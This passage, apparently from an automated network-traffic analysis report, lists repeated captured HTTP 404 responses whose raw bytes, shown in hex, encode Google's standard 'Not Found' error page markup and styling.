31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 